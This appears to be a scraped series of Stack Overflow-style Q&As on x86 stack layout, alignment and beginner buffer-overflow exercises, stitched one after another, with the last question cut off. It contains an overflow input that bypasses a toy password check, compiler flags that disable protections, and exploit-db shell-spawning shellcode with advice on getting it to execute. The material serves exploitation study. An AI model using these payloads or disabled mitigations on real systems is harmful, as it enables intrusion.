I'm having trouble figuring out how to disable stack protection on OS X 10.10.5 (Yosemite). I've sort of been cobbling together promising gcc flags from various threads online, but as of yet haven't managed to disable the protection. I am currently compiling my program with:
gcc -g3 -std=c99 -pedantic -Wall -m32 -fno-stack-protector -fno-sanitize=address -D_FORTIFY_SOURCE=0 -Wl,-no_pie -o program program.c
But when I try to smash the stack I segfault.
I have tried the same program on Red Hat Enterprise Linux Server 7.2 (Maipo), and after adjusting for memory address differences where appropriate, have had no problems smashing the stack after compiling with:
gcc -g3 -std=c99 -pedantic -Wall -m32 -fno-stack-protector -o program program.c
It's also probably worth noting that, as on most Macs, gcc on my machine is a symlink to clang (Apple LLVM version 7.0.0 (clang-700.0.72)).
How can I disable Yosemite's stack protection?
Additional Details
The dummy program I'm working with is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int authenticate() {
char password[10];
printf("Enter password: ");
scanf("%s", password);
return strcmp(password, "1234567890") == 0;
}
void success() {
printf("Access granted\n");
exit(0);
}
void failure() {
printf("Access denied\n");
exit(1);
}
int main(int argc, char** argv) {
if (authenticate()) {
success();
} else {
failure();
}
}
When I run otool -tv program, I note the following:
The success routine to which I want to jump is at address 0x00001e70.
The instruction to which we would normally return after authenticate is at address 0x00001efe.
When I run gdb after entering the dummy password "xxxxxxxxxx" and inspecting the buffer with x/30xb &password, I observe:
0xbffffc32: 0x78 0x78 0x78 0x78 0x78 0x78 0x78 0x78
0xbffffc3a: 0x78 0x78 0x00 0x00 0x00 0x00 0x00 0x00
0xbffffc42: 0x00 0x00 0xfc 0xfc 0xff 0xbf 0x68 0xfc
0xbffffc4a: 0xff 0xbf 0xfe 0x1e 0x00 0x00
We want to overwrite the 27th 0xfe byte to be 0x70.
When I try to smash the stack as follows:
printf "xxxxxxxxxxxxxxxxxxxxxxxxxx\x70" | ./program # 26 bytes of junk, followed by 0x70
I get a segfault.
The OS X ABI requires that system calls (such as the one to exit in success) be issued from a 16-byte-aligned stack. When you jump into success, you get off by 4 bytes because it doesn't have another return address sitting on the stack (ie, you're supposed to call the function)
The fix for this is to jump to a call to success in a higher stack frame. Jumping to the one in main works for me:
(gdb) disas main
Dump of assembler code for function main:
0x00001ed0 <+0>: push %ebp
0x00001ed1 <+1>: mov %esp,%ebp
0x00001ed3 <+3>: sub $0x18,%esp
0x00001ed6 <+6>: mov 0xc(%ebp),%eax
0x00001ed9 <+9>: mov 0x8(%ebp),%ecx
0x00001edc <+12>: movl $0x0,-0x4(%ebp)
0x00001ee3 <+19>: mov %ecx,-0x8(%ebp)
0x00001ee6 <+22>: mov %eax,-0xc(%ebp)
0x00001ee9 <+25>: call 0x1df0 <authenticate>
0x00001eee <+30>: cmp $0x0,%eax
0x00001ef1 <+33>: je 0x1f01 <main+49>
0x00001ef7 <+39>: call 0x1e60 <success>
0x00001efc <+44>: jmp 0x1f06 <main+54>
0x00001f01 <+49>: call 0x1e90 <failure>
0x00001f06 <+54>: mov -0x4(%ebp),%eax
0x00001f09 <+57>: add $0x18,%esp
0x00001f0c <+60>: pop %ebp
0x00001f0d <+61>: ret
Then return to the call 0x1ef7 instruction:
$ perl -e 'print "P"x26, "\xf7\x1e"' | ./stack
Enter password: Root access has been granted
$
Related
This question already has an answer here:
Why does GCC allocate more stack memory than needed?
(1 answer)
Closed 8 months ago.
I'm reading Programming from the Ground Up.
pdf address: http://mirror.ossplanet.net/nongnu/pgubook/ProgrammingGroundUp-0-8.pdf
I'm curious about Page37's reserve space for local variables.
He said, we need to 2 words of memory, so move stack pointer down 2 words.
execute this instruction: subl $8, %esp
so, here, I think I'm understand.
But, I write c code to verify this reserve space.
#include <stdio.h>
int test(int a1, int a2, int a3, int a4, int a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12) {
printf("a1=%#x, a2=%#x, a3=%#x, a4=%#x, a5=%#x, a6=%#x, a7=%#x, a8=%#x, a9=%#x, a10=%#x, a11=%#x, a12=%#x", a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12);
return 0;
}
int main(void){
test(0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x10, 0x11, 0x12);
printf("Wick is me!");
return 0;
}
then, I use gcc convert to Executable file, gcc -Og -g, and use gdb debugger.
I use disass to main function, and copied some of the asm code in below.
0x000055555555519d <+0>: endbr64
0x00005555555551a1 <+4>: sub $0x8,%rsp # reserve space?
0x00005555555551a5 <+8>: pushq $0x12
0x00005555555551a7 <+10>: pushq $0x11
0x00005555555551a9 <+12>: pushq $0x10
0x00005555555551ab <+14>: pushq $0x9
0x00005555555551ad <+16>: pushq $0x8
0x00005555555551af <+18>: pushq $0x7
0x00000000000011b1 <+20>: mov $0x6,%r9d
0x00000000000011b7 <+26>: mov $0x5,%r8d
0x00000000000011bd <+32>: mov $0x4,%ecx
0x00000000000011c2 <+37>: mov $0x3,%edx
0x00000000000011c7 <+42>: mov $0x2,%esi
0x00000000000011cc <+47>: mov $0x1,%edi
0x00000000000011d1 <+52>: callq 0x1149 <test>
0x00000000000011d6 <+57>: add $0x30,%rsp
0x00000000000011da <+61>: lea 0xe89(%rip),%rsi # 0x206a
0x00000000000011e1 <+68>: mov $0x1,%edi
0x00000000000011e6 <+73>: mov $0x0,%eax
0x00000000000011eb <+78>: callq 0x1050 <__printf_chk#plt>
0x00000000000011f0 <+83>: mov $0x0,%eax
0x00000000000011f5 <+88>: add $0x8,%rsp
0x00005555555551f9 <+92>: retq
I'm dubious that this is reserve space instruction. then, I execute assembly code line by line and check content in the stack.
Why is this instruction only sub 8 byte, and 0x7fffffffe390 seems main function's return address. Should this not be reserve space?
below is rsp address nearby content. i r $rsp, x/40xb rsp address
0x7fffffffe390: 0x00 0x52 0x55 0x55 0x55 0x55 0x00 0x00 => after sub
0x7fffffffe398: 0xb3 0x20 0xdf 0xf7 0xff 0x7f 0x00 0x00 => before sub
then, I execute all pushq instruction, and use x/64xb 0x7fffffffe360.
0x7fffffffe360: 0x07 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe368: 0x08 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe370: 0x09 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe378: 0x10 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe380: 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe388: 0x12 0x00 0x00 0x00 0x00 0x00 0x00 0x00
above is local variables
==========================
0x7fffffffe390: 0x00 0x52 0x55 0x55 0x55 0x55 0x00 0x00
0x7fffffffe398: 0xb3 0x20 0xdf 0xf7 0xff 0x7f 0x00 0x00
I think 0x7fffffffe390~0x7fffffffe398 is reserve space for local variables, but it no change! Is my test way wrong?
Execution environment:
GDB version: 9.2
GCC version: 9.4.0
os: x86_64 GNU/Linux
The x86-64 SysV ABI requires that stacks be 16-aligned at the time of a call.
Since a call instructions pushes an 8-byte return-address to the stack, the stack is always misaligned by 8 at the start of a function and if a nested call is to be made then the caller will need to have pushed an odd number of eight-bytes to the stack to make it 16-aligned again.
Since your function takes 12 integer arguments, 6 of which go to the stack as eight-bytes each, an extra 8-byte needs to be pushed to the stack before the stack arguments so the stack is 16-aligned before the call.
If your function took 11 arguments (or any other 6 (register arguments) +odd stack number of arguments), then no extra stack push should be needed.
Gcc and clang are still weirdly generating
sub rsp, 16 (gcc) and push rax; sub rsp, 8; (clang) for that case (https://gcc.godbolt.org/z/jGj5WPq8c). I don't understand why.
Recall that in x86_64, the call instruction does the following:
push the current value of RIP, which is the next instruction that will be executed when the function returns. (which moves RSP down in
memory - recall that in x86_64 the stack grows down, thus RBP > RSP).
push the current value of RBP, which is used to help restore the caller's stack frame. (which moves RSP down again)
move the current bottom pointer, RBP, to the current stack pointer, RSP. (effectively this creates a zero sized stack starting at where RSP is currently at)
Thus in the memory dump that you show:
0x7fffffffe390: 0x00 0x52 0x55 0x55 0x55 0x55 0x00 0x00
0x7fffffffe398: 0xb3 0x20 0xdf 0xf7 0xff 0x7f 0x00 0x00
The value at 0x7fffffffe390 is the address of the next function to be executed afer the return from main. This instruction is located at 0x0000555555555200 (remember that intel processor are little endian, so you have to read the value backwards). This memory address is consistent with the other memory values you've shown for the code.
Additionally, the bottom of the stack frame for main (RBP) is located at 0x7ffff7df20b3, which looks consistent with the other stack addresses you've shown.
As soon as the call to `main' is executed, you enter the preable of the function, which is the first three lines of the disassembly you have:
0x000055555555519d <+0>: endbr64
0x00005555555551a1 <+4>: sub $0x8,%rsp # reserve space?
0x00005555555551a5 <+8>: pushq $0x12
The second line sub $0x8, %rsp subtracts 0x8 from the stack pointer, thus forming a new stack from RBP->RSP. This space is the space reserved for local variables (and any other space that might be needed as the function executes.
Next we have a series of pushq's and mov's - and these all are doing the same thing. You need to recall that
arguments to a function are evaluated right to left, thus the last argument to test is evaluated first
the fist six arguments are passed in registers in 64-bit code, thus
a1 -> a6 are passed in the register that you see.
anything beyond six arguments are pushed on the stack, thus a7 -> a12 are pushed on the stack.
All of you arguments are literals, so there is no local variables and the values are used directly in the pushq's or mov's.
The next bit of assembly is
0x00000000000011d1 <+52>: callq 0x1149 <test>
0x00000000000011d6 <+57>: add $0x30,%rsp
0x00000000000011da <+61>: lea 0xe89(%rip),%rsi # 0x206a
0x00000000000011e1 <+68>: mov $0x1,%edi
0x00000000000011e6 <+73>: mov $0x0,%eax
In this we see the actual call to test. The next instruction is to clean up the stack. Recall that we push 6 8-byte values on the stack, causing the stack to grow downwards by 48-bytes. Adding 0x30 (48 decimal) effectively removes thos 6 values from the stack by moving RSP upward.
The next two lines are setting up the parameters that are going to be passed to printf, the next line mov $0x0, %eax is clearing the EAX, which is where the return value from a function typically goes.
The last bit of assembly (memory address have change, I suspect that this is from a second run of the code):
0x00000000000011eb <+78>: callq 0x1050 <__printf_chk#plt>
0x00000000000011f0 <+83>: mov $0x0,%eax
0x00000000000011f5 <+88>: add $0x8,%rsp
0x00005555555551f9 <+92>: retq
performs that actual call to printf, then clears the return value (printf returns an int value with the number of characters printed), and finally the add $0x8, %rsp undoes the subtraction performed on line 2 of the disassembly, effectively destroying the stack frame for main. The last line retq is the return from main.
You are correct in that sub $0x8,%rsp is reserving 8 bytes for local variables (or intermediate values). However, main does not use any local variables, so nothing is going to change.
As a test, you could add a few local variables to main:
int a = 5, b = 10, c;
c = 3*a + 2*b;
printf("Wick is me %d\n", c); // <--- note modification in this line
In this case you should see some modification to the value being subtracted from RSP in line 2. We would expect an additional 24 byte of stack space being needed, however it can be different for a few reasons
The results of the calculations 3*a' and 2*b' need to be stored somewhere -- either on the stack or in registers.
The value of a and b are literals and may be stored in registers.
The compiles might be able to deduce that 3a + 2b is a constant and perform the math at compile time, optimize away both a' and b' and just set `c' to 35.
Using -O0 or -Og as well as using -m32 (forcing code for a 32-bit processor) might remove some of these issues.
Update:
I misread -Og as -O0. With optimization on, there are several additional complications (such as how exactly GCC choses to pass arguments, whether it reserves space for locals at all or keeps these locals in a register, etc. etc.).
To understand what's going on, you should first understand the picture without optimizations.
Where is reserve space?
There are several ways to "reserve space" on stack on x86_64:
push ...
sub ...,%rsp
enter ...
There are also several ways to "unreserve" it: pop ..., add ...,%rsp, leave.
In your case, it's the pushq instruction which simultaneously puts a value into the stack slot and reserves space for that value.
You didn't show what happens just before retq, but I suspect that your "unreserve" looks something like add $68,%rsp.
P.S. You have a sequence of 0x01, 0x02 ..., 0x09, 0x10, .... Note that these are not consecutive numbers: the next number after 0x09 is 0x0a.
I'm learning about buffer overflow in c.
For that purpose, I'm following this simple example.
I have the following gcc version:
$ gcc --version
gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
And this simple c file:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buf[256];
strcpy(buf, argv[1]);
printf("%s,", buf);
return 0;
}
I then compile this file with $ gcc buf.c -o buf.
I then open in gdb by $ gdb ./buf
I call disas and get the result assembly:
(gdb) disas main
Dump of assembler code for function main:
0x0000000000001189 <+0>: endbr64
0x000000000000118d <+4>: push %rbp
0x000000000000118e <+5>: mov %rsp,%rbp
0x0000000000001191 <+8>: sub $0x120,%rsp
0x0000000000001198 <+15>: mov %edi,-0x114(%rbp)
0x000000000000119e <+21>: mov %rsi,-0x120(%rbp)
0x00000000000011a5 <+28>: mov %fs:0x28,%rax
0x00000000000011ae <+37>: mov %rax,-0x8(%rbp)
0x00000000000011b2 <+41>: xor %eax,%eax
0x00000000000011b4 <+43>: mov -0x120(%rbp),%rax
0x00000000000011bb <+50>: add $0x8,%rax
0x00000000000011bf <+54>: mov (%rax),%rdx
0x00000000000011c2 <+57>: lea -0x110(%rbp),%rax
0x00000000000011c9 <+64>: mov %rdx,%rsi
0x00000000000011cc <+67>: mov %rax,%rdi
0x00000000000011cf <+70>: callq 0x1070 <strcpy#plt>
--Type <RET> for more, q to quit, c to continue without paging--
0x00000000000011d4 <+75>: lea -0x110(%rbp),%rax
0x00000000000011db <+82>: mov %rax,%rsi
0x00000000000011de <+85>: lea 0xe1f(%rip),%rdi # 0x2004
0x00000000000011e5 <+92>: mov $0x0,%eax
0x00000000000011ea <+97>: callq 0x1090 <printf#plt>
0x00000000000011ef <+102>: mov $0x0,%eax
0x00000000000011f4 <+107>: mov -0x8(%rbp),%rcx
0x00000000000011f8 <+111>: xor %fs:0x28,%rcx
0x0000000000001201 <+120>: je 0x1208 <main+127>
0x0000000000001203 <+122>: callq 0x1080 <__stack_chk_fail#plt>
0x0000000000001208 <+127>: leaveq
0x0000000000001209 <+128>: retq
End of assembler dump.
With some really low memory adresses.
I then want to see what happens if I input a big string of A's into the program, I therefore place a breakpoint at 0x00000000000011db
I then run it:
(gdb) run $(python3 -c "print('A'*256)"
Starting program: /home/ask/Notes/ctf/bufoverflow/code/buf $(python3 -c "print('A'*256)"
/bin/bash: -c: line 0: unexpected EOF while looking for matching `)'
/bin/bash: -c: line 1: syntax error: unexpected end of file
During startup program exited with code 1.
(gdb) run $(python3 -c "print('A'*256)")
Starting program: /home/ask/Notes/ctf/bufoverflow/code/buf $(python3 -c "print('A'*256)")
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x11db
Ok, so something with the memory adresses is a bit funky.
I google the issue and find this post where I find that this is because Position-Independent Executable (PIE) was probably enabled, and the memory adresses would be changed when the program is actually run.
I can confirm this by running disas after running the program, and seeing that the memory adresses are in a lot higher ranges.
This all makes sense, but it makes me wonder, iif the adresses change every time I run it, then how can I then place a breakpoint at a memory adress before the program runs?
iif the adresses change every time I run it, then how can I then place a breakpoint at a memory adress before the program runs?
This happens because GDB by default disables address randomization (to make debugging easier).
If you re-enable ASLR with (gdb) set disable-randomization off, then you wouldn't be able to set the breakpoint on an address.
You would still be able to set breakpoint on e.g. main -- in that case GDB will wait until the executable has been relocated, and will set the breakpoint on the actual runtime instruction (the address will change on every run).
https://www.exploit-db.com/exploits/42179
#include <stdio.h>
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
According to the comment in the code, gcc -fno-stack-protector -z execstack shell.c -o shell is supposed to compiled the code on #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux.
I get the following error when I try the above code. How to make it work? What has been changed in the OS so that it does not work any more?
$ uname -a
Linux kali 5.10.0-kali4-amd64 #1 SMP Debian 5.10.19-1kali1 (2021-03-03) x86_64 GNU/Linux
$ gcc -fno-stack-protector -z execstack shell.c -o shell
$ ./shell
Segmentation fault
EDIT: It seems the problem is related with kali linux. The same binary runs on Ubuntu 64bit. I tried to step through the binary with gdb on kali.
The segmentation fault on kali is generated when the shellcode is run.
$ gdb -q shell
Reading symbols from shell...
(No debugging symbols found in shell)
(gdb) b main
Breakpoint 1 at 0x1129
(gdb) start
Temporary breakpoint 2 at 0x1129
Starting program: /tmp/shell
Breakpoint 1, 0x0000555555555129 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
=> 0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si 5
0x0000555555555141 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
=> 0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si
0x0000555555558030 in shellcode ()
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558030 in shellcode ()
(gdb) x/16bx 0x0000555555558030
0x555555558030 <shellcode>: 0x50 0x48 0x31 0xd2 0x48 0x31 0xf6 0x48
0x555555558038 <shellcode+8>: 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73
Using the same binary on Ubuntu, the shellcode runs correctly.
When I modify the code by putting the shellcode in the stack, then it can run on kali. So the problem is related with whether code in data can be run or not. What controls this behavior?
$ cat shell.c
#include <stdio.h>
int main() {
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int (*ret)() = (int(*)())shellcode;
ret();
}
What has been changed in the OS so that it does not work any more?
It used to be that readonly-data (.rodata) was put into the read-execute segment, together with .text.
To put shellcode into .rodata, you would need to make it const:
unsigned const char shellcode[] = ...
I don't think the example without const ever worked.
Once you put it into .rodata, it will work when linking with -Wl,-z,noseparate-code on newer systems (if your linker doesn't support noseparate-code, then it is probably old enough that the example will work without any special flags).
This my program:
void test_function(int a, int b, int c, int d){
int flag;
char buffer[10];
flag = 31337;
buffer[0] = 'A';
}
int main() {
test_function(1, 2, 3, 4);
}
I compile this program with the debug option:
gcc -g my_program.c
I use gdb and I disassemble the test_function with intel syntax:
(gdb) disassemble test_function
Dump of assembler code for function test_function:
0x08048344 <test_function+0>: push ebp
0x08048345 <test_function+1>: mov ebp,esp
0x08048347 <test_function+3>: sub esp,0x28
0x0804834a <test_function+6>: mov DWORD PTR [ebp-12],0x7a69
0x08048351 <test_function+13>: mov BYTE PTR [ebp-40],0x41
0x08048355 <test_function+17>: leave
0x08048356 <test_function+18>: ret
End of assembler dump.
And I disassemble the main:
(gdb) disassemble main
Dump of assembler code for function main:
0x08048357 <main+0>: push ebp
0x08048358 <main+1>: mov ebp,esp
0x0804835a <main+3>: sub esp,0x18
0x0804835d <main+6>: and esp,0xfffffff0
0x08048360 <main+9>: mov eax,0x0
0x08048365 <main+14>: sub esp,eax
0x08048367 <main+16>: mov DWORD PTR [esp+12],0x4
0x0804836f <main+24>: mov DWORD PTR [esp+8],0x3
0x08048377 <main+32>: mov DWORD PTR [esp+4],0x2
0x0804837f <main+40>: mov DWORD PTR [esp],0x1
0x08048386 <main+47>: call 0x8048344 <test_function>
0x0804838b <main+52>: leave
0x0804838c <main+53>: ret
End of assembler dump.
I place a breakpoint at this adresse: 0x08048355 (leave instruction for the test_function) and I run the program.
I watch the stack like this:
(gdb) x/16w $esp
0xbffff7d0: 0x00000041 0x08049548 0xbffff7e8 0x08048249
0xbffff7e0: 0xb7f9f729 0xb7fd6ff4 0xbffff818 0x00007a69
0xbffff7f0: 0xb7fd6ff4 0xbffff8ac 0xbffff818 0x0804838b
0xbffff800: 0x00000001 0x00000002 0x00000003 0x00000004
0x0804838b is the return adress, 0xbffff818 is the saved frame pointer (main ebp) and flag variable is stocked 12 bytes further. Why 12?
I don't understand this instruction:
0x0804834a <test_function+6>: mov DWORD PTR [ebp-12],0x7a69
Why we don't stock the content's variable 0x00007a69 in ebp-4 instead of 0xbffff8ac?
Same question for buffer. Why 40?
We don't waste the memory? 0xb7fd6ff4 0xbffff8ac and 0xb7f9f729 0xb7fd6ff4 0xbffff818 0x08049548 0xbffff7e8 0x08048249 are not used?
This the output for the command gcc -Q -v -g my_program.c:
Reading specs from /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/specs
Configured with: ../src/configure -v --enable-languages=c,c++ --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --enable-__cxa_atexit --with-system-zlib --enable-nls --without-included-gettext --enable-clocale=gnu --enable-debug i486-linux-gnu
Thread model: posix
gcc version 3.3.6 (Ubuntu 1:3.3.6-15ubuntu1)
/usr/lib/gcc-lib/i486-linux-gnu/3.3.6/cc1 -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=6 notesearch.c -dumpbase notesearch.c -auxbase notesearch -g -version -o /tmp/ccGT0kTf.s
GNU C version 3.3.6 (Ubuntu 1:3.3.6-15ubuntu1) (i486-linux-gnu)
compiled by GNU C version 3.3.6 (Ubuntu 1:3.3.6-15ubuntu1).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129473
options passed: -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=6
-auxbase -g
options enabled: -fpeephole -ffunction-cse -fkeep-static-consts
-fpcc-struct-return -fgcse-lm -fgcse-sm -fsched-interblock -fsched-spec
-fbranch-count-reg -fcommon -fgnu-linker -fargument-alias
-fzero-initialized-in-bss -fident -fmath-errno -ftrapping-math -m80387
-mhard-float -mno-soft-float -mieee-fp -mfp-ret-in-387
-maccumulate-outgoing-args -mcpu=pentiumpro -march=i486
ignoring nonexistent directory "/usr/local/include/i486-linux-gnu"
ignoring nonexistent directory "/usr/i486-linux-gnu/include"
ignoring nonexistent directory "/usr/include/i486-linux-gnu"
#include "..." search starts here:
#include <...> search starts here:
/usr/local/include
/usr/lib/gcc-lib/i486-linux-gnu/3.3.6/include
/usr/include
End of search list.
gnu_dev_major gnu_dev_minor gnu_dev_makedev stat lstat fstat mknod fatal ec_malloc dump main print_notes find_user_note search_note
Execution times (seconds)
preprocessing : 0.00 ( 0%) usr 0.01 (25%) sys 0.00 ( 0%) wall
lexical analysis : 0.00 ( 0%) usr 0.01 (25%) sys 0.00 ( 0%) wall
parser : 0.02 (100%) usr 0.01 (25%) sys 0.00 ( 0%) wall
TOTAL : 0.02 0.04 0.00
as -V -Qy -o /tmp/ccugTYeu.o /tmp/ccGT0kTf.s
GNU assembler version 2.17.50 (i486-linux-gnu) using BFD version 2.17.50 20070103 Ubuntu
/usr/lib/gcc-lib/i486-linux-gnu/3.3.6/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/../../../crt1.o /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/../../../crti.o /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/crtbegin.o -L/usr/lib/gcc-lib/i486-linux-gnu/3.3.6 -L/usr/lib/gcc-lib/i486-linux-gnu/3.3.6/../../.. /tmp/ccugTYeu.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/crtend.o /usr/lib/gcc-lib/i486-linux-gnu/3.3.6/../../../crtn.o
NOTE: I read the book "The art of exploitation" and I use the VM provides with the book.
The compiler is trying to maintain 16 byte alignment on the stack. This also applies to 32-bit code these days (not just 64-bit). The idea is that at the point before executing a CALL instruction the stack must be aligned to a 16-byte boundary.
Because you compiled with no optimizations there are some extraneous instructions.
0x0804835a <main+3>: sub esp,0x18 ; Allocate local stack space
0x0804835d <main+6>: and esp,0xfffffff0 ; Ensure `main` has a 16 byte aligned stack
0x08048360 <main+9>: mov eax,0x0 ; Extraneous, not needed
0x08048365 <main+14>: sub esp,eax ; Extraneous, not needed
ESP is now 16-byte aligned after the last instruction above. We move the parameters for the call starting at the top of the stack at ESP. That is done with:
0x08048367 <main+16>: mov DWORD PTR [esp+12],0x4
0x0804836f <main+24>: mov DWORD PTR [esp+8],0x3
0x08048377 <main+32>: mov DWORD PTR [esp+4],0x2
0x0804837f <main+40>: mov DWORD PTR [esp],0x1
The CALL then pushes a 4 byte return address on the stack. We then reach these instructions after the call:
0x08048344 <test_function+0>: push ebp ; 4 bytes pushed on stack
0x08048345 <test_function+1>: mov ebp,esp ; Setup stackframe
This pushes another 4 bytes on the stack. With the 4 bytes from the return address we are now misaligned by 8 bytes. To reach 16-byte alignment again we will need to waste an additional 8 bytes on the stack. That is why in this statement there is an additional 8 bytes allocated:
0x08048347 <test_function+3>: sub esp,0x28
0x08 bytes already on stack because of return address(4-bytes) and EBP(4 bytes)
0x08 bytes of padding needed to align stack back to 16-byte alignment
0x20 bytes needed for local variable allocation = 32 bytes.
32/16 is evenly divisible by 16 so alignment maintained
The second and third number above added together is the value 0x28 computed by the compiler and used in sub esp,0x28.
0x0804834a <test_function+6>: mov DWORD PTR [ebp-12],0x7a69
So why [ebp-12] in this instruction? The first 8 bytes [ebp-8] through [ebp-1] are the alignment bytes used to get the stack 16-byte aligned. The local data will then appear on the stack after that. In this case [ebp-12] through [ebp-9] are the 4 bytes for the 32-bit integer flag.
Then we have this for updating buffer[0] with the character 'A':
0x08048351 <test_function+13>: mov BYTE PTR [ebp-40],0x41
The oddity then would be why a 10 byte array of characters would appear from [ebp+40](beginning of array) to [ebp+13] which is 28 bytes. The best guess I can make is that compiler felt that it could treat the 10 byte character array as a 128-bit (16-byte) vector. This would force the compiler to align the buffer on a 16 byte boundary, and pad the array out to 16 bytes (128-bits). From the perspective of the compiler, your code seems to be acting much like it was defined as:
#include <xmmintrin.h>
void test_function(int a, int b, int c, int d){
int flag;
union {
char buffer[10];
__m128 m128buffer; ; 16-byte variable that needs to be 16-bytes aligned
} bufu;
flag = 31337;
bufu.buffer[0] = 'A';
}
The output on GodBolt for GCC 4.9.0 generating 32-bit code with SSE2 enabled appears as follows:
test_function:
push ebp #
mov ebp, esp #,
sub esp, 40 #,same as: sub esp,0x28
mov DWORD PTR [ebp-12], 31337 # flag,
mov BYTE PTR [ebp-40], 65 # bufu.buffer,
leave
ret
This looks very similar to your disassembly in GDB.
If you compiled with optimizations (such as -O1, -O2, -O3), the optimizer could have simplified test_function because it is a leaf function in your example. A leaf function is one that doesn't call another function. Certain shortcuts could have been applied by the compiler.
As for why the character array seems to be aligned to a 16-byte boundary and padded to be 16 bytes? That probably can't be answered with certainty until we know what GCC compiler you are using (gcc --version will tell you). It would also be useful to know your OS and OS version. Even better would be to add the output from this command to your question gcc -Q -v -g my_program.c
Unless you're trying to improve gcc's code itself, understanding why un-optimized code is as bad as it is will mostly be a waste of time. Look at output from -O3 if you want to see what a compiler does with your code, or from -Og if you want to see a more literal translation of your source into asm. Write functions that take input in args and produce output in globals or return values, so the optimized asm isn't just ret.
You shouldn't expect anything efficient from gcc -O0. It makes the most braindead literal translation of your source.
I can't reproduce that asm output with any gcc or clang version on http://gcc.godbolt.org/. (gcc 4.4.7 to gcc 5.3.0, clang 3.0 to clang 3.7.1). (Note that godbolt use g++, but you can use -x c to treat the input as C, instead of compiling it as C++. This can sometimes change the asm output, even when you don't use any features C99 / C11 has but C++ doesn't. (e.g. C99 variable-length arrays).
Some versions of gcc default to emitting extra code unless I use -fno-stack-protector.
I thought at first that the extra space reserved by test_function was to copy its args down into its stack frame, but at least modern gcc doesn't do this. (64bit gcc does store its args into memory when they arrive in registers, but that's different. 32bit gcc will increment an arg in place on the stack, without copying it.)
The ABI does allow the called function to clobber its args on the stack, so a caller that wanted to make repeated function calls with the same args would have to keep storing them between calls.
clang 3.7.1 with -O0 does copy its args down into locals, but that still only reserves 32 (0x20) bytes.
This is about the best answer you're going to get unless you tell us which version of gcc you're using...
I write a simple C program in Solaris and want to check the assembly code of dup:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv)
{
int pdes[2];
if(-1 != (pipe(pdes)))
{
//printf("%d\n", dup(pdes[0]));
dup(pdes[0]);
}
return 0;
}
(1) I use gdb, and gdb outputs the assembly code:
(gdb) disassemble dup
Dump of assembler code for function dup:
0xff2cda44 <+0>: mov 0x29, %g1 ! 0x29
0xff2cda48 <+4>: ta 8
0xff2cda4c <+8>: bcs 0xff223be0 <_cerror>
0xff2cda50 <+12>: nop
0xff2cda54 <+16>: retl
0xff2cda58 <+20>: nop
End of assembler dump.
(2) I use mdb, and mdb outputs the assembly code:
> dup::dis
PLT:dup: sethi %hi(0x21000), %g1
PLT:dup: ba,a -0x88 <0x20a14>
PLT:dup: nop
0x20aa4: nop
0x20aa8: unimp 0x1
0x20aac: unimp 0xe0
0x20ab0: unimp 0xc
0x20ab4: unimp 0x109b8
0x20ab8: unimp 0xd
